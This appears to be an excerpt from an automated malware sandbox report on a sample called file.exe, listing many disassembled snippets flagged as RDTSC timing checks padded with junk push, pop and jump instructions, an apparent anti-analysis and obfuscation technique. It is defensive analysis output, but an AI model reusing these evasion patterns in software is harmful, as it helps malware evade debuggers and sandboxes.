              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D642E second address: 13D6461 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F4379442F5Fh 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F4379442F5Ch 0x00000014 jns 00007F4379442F5Eh 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9747 second address: 13D974D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D974D second address: 13D9753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9753 second address: 13D975F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F4378D2BA26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D975F second address: 13D9763 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13D9763 second address: 13D9782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F4378D2BA35h 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC996 second address: 13DC99A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC99A second address: 13DC9F4 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F4378D2BA26h 0x00000008 jmp 00007F4378D2BA35h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 push edi 0x00000011 pop edi 0x00000012 push edx 0x00000013 pop edx 0x00000014 jnl 00007F4378D2BA26h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d jl 00007F4378D2BA35h 0x00000023 jmp 00007F4378D2BA2Fh 0x00000028 popad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c jmp 00007F4378D2BA34h 0x00000031 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC9F4 second address: 13DC9FE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13DC9FE second address: 13DCA04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13680AE second address: 13680B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13680B4 second address: 13680B8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E29A5 second address: 13E29CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 ja 00007F4379442F6Dh 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E29CA second address: 13E29D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136EA95 second address: 136EA9A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136EA9A second address: 136EAA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136EAA0 second address: 136EACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F4379442F69h 0x0000000e push ebx 0x0000000f je 00007F4379442F56h 0x00000015 push esi 0x00000016 pop esi 0x00000017 pop ebx 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136EACC second address: 136EAD1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 136EAD1 second address: 136EAD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1785 second address: 13E178B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E18D0 second address: 13E18D8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1CCA second address: 13E1CCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1CCE second address: 13E1CDA instructions: 0x00000000 rdtsc 0x00000002 jo 00007F4379442F56h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E1CDA second address: 13E1CE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E2184 second address: 13E218B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364B04 second address: 1364B08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1364B08 second address: 1364B20 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379442F64h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7622 second address: 13E762C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E762C second address: 13E7630 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E77C8 second address: 13E77D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ecx 0x00000007 pop ecx 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E77D1 second address: 13E77E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F4379442F56h 0x0000000a ja 00007F4379442F56h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7C12 second address: 13E7C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7C16 second address: 13E7C1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7C1A second address: 13E7C24 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E7C24 second address: 13E7C28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E808C second address: 13E8092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E8092 second address: 13E8096 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E8096 second address: 13E80AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D2BA32h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E81EA second address: 13E820A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jmp 00007F4379442F69h 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E820A second address: 13E8214 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4378D2BA26h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E8214 second address: 13E8222 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F4379442F56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E8222 second address: 13E825A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F4378D2BA26h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop edx 0x0000000d pop eax 0x0000000e je 00007F4378D2BA50h 0x00000014 push ebx 0x00000015 jg 00007F4378D2BA26h 0x0000001b pop ebx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F4378D2BA34h 0x00000023 jnc 00007F4378D2BA26h 0x00000029 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13938C9 second address: 13938CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13938CD second address: 13938D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E8994 second address: 13E899A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E899A second address: 13E899F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E899F second address: 13E89AB instructions: 0x00000000 rdtsc 0x00000002 js 00007F4379442F5Eh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E89AB second address: 13E89B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13E719C second address: 13E71DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4379442F5Dh 0x00000007 jmp 00007F4379442F5Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F4379442F60h 0x00000016 jmp 00007F4379442F64h 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA538 second address: 13EA556 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F4378D2BA35h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA556 second address: 13EA55C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA55C second address: 13EA57E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D2BA37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA57E second address: 13EA584 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA584 second address: 13EA58D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA58D second address: 13EA592 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA592 second address: 13EA598 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA598 second address: 13EA59E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EA59E second address: 13EA5C3 instructions: 0x00000000 rdtsc 0x00000002 js 00007F4378B444A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jmp 00007F4378B444B6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B00F5 second address: 13B00F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B05C6 second address: 13B05CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B05CA second address: 13B05E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B05E2 second address: 13B05F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4378B444ADh 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B05F3 second address: 13B064E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 6BA00921h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F4378D5BDC8h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 00000017h 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 call 00007F4378D5BDD8h 0x0000002e mov ecx, ebx 0x00000030 pop edx 0x00000031 push 13E4070Bh 0x00000036 pushad 0x00000037 jnl 00007F4378D5BDC8h 0x0000003d push eax 0x0000003e push edx 0x0000003f push ebx 0x00000040 pop ebx 0x00000041 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B06F3 second address: 13B0742 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 pushad 0x00000007 jmp 00007F4378B444B5h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f jnl 00007F4378B444B1h 0x00000015 popad 0x00000016 xchg eax, esi 0x00000017 mov edx, eax 0x00000019 nop 0x0000001a jmp 00007F4378B444B4h 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push ebx 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0742 second address: 13B0747 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B09EB second address: 13B09FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F4378B444A6h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B09FB second address: 13B0A47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378D5BDD5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007F4378D5BDC8h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 push 00000004h 0x00000027 mov ch, 82h 0x00000029 nop 0x0000002a pushad 0x0000002b jl 00007F4378D5BDC8h 0x00000031 pushad 0x00000032 popad 0x00000033 push edi 0x00000034 push eax 0x00000035 push edx 0x00000036 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0A47 second address: 13B0A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0E35 second address: 13B0EA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F4378D5BDC8h 0x0000000c popad 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007F4378D5BDC8h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 0000001Ah 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 push 0000001Eh 0x0000002a push 00000000h 0x0000002c push ebx 0x0000002d call 00007F4378D5BDC8h 0x00000032 pop ebx 0x00000033 mov dword ptr [esp+04h], ebx 0x00000037 add dword ptr [esp+04h], 0000001Ch 0x0000003f inc ebx 0x00000040 push ebx 0x00000041 ret 0x00000042 pop ebx 0x00000043 ret 0x00000044 pushad 0x00000045 mov bx, ax 0x00000048 mov dword ptr [ebp+122D28FFh], edx 0x0000004e popad 0x0000004f mov dword ptr [ebp+1244A343h], ebx 0x00000055 nop 0x00000056 push esi 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a popad 0x0000005b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EDD48 second address: 13EDD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F4378B444A6h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EE1C5 second address: 13EE1CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EE1CA second address: 13EE1DA instructions: 0x00000000 rdtsc 0x00000002 jng 00007F4378B444B2h 0x00000008 jc 00007F4378B444A6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13EE1DA second address: 13EE1EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push edi 0x00000006 pop edi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 135FC6B second address: 135FC6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F0849 second address: 13F0853 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F4378D5BDC6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1368092 second address: 13680A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4378B444ADh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13680A3 second address: 13680AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F319E second address: 13F31A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137226F second address: 137228B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 ja 00007F4378D5BDD2h 0x0000000b pop eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137228B second address: 1372296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1372296 second address: 137229A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 137229A second address: 13722A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F8785 second address: 13F878B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F878B second address: 13F8791 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13B0C75 second address: 13B0C7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F975E second address: 13F9768 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13F9768 second address: 13F976D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC12F second address: 13FC135 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC5C3 second address: 13FC5C9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC5C9 second address: 13FC5CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC5CF second address: 13FC5FA instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jg 00007F4378D5BDD2h 0x0000000f js 00007F4378D5BDC8h 0x00000015 pushad 0x00000016 popad 0x00000017 push eax 0x00000018 push edx 0x00000019 jo 00007F4378D5BDC6h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 13FC5FA second address: 13FC5FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 140093C second address: 140095E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F4378D5BDC6h 0x0000000a pop ecx 0x0000000b pushad 0x0000000c jmp 00007F4378D5BDCCh 0x00000011 jo 00007F4378D5BDC6h 0x00000017 push edi 0x00000018 pop edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1400D45 second address: 1400D4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1400EE7 second address: 1400EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
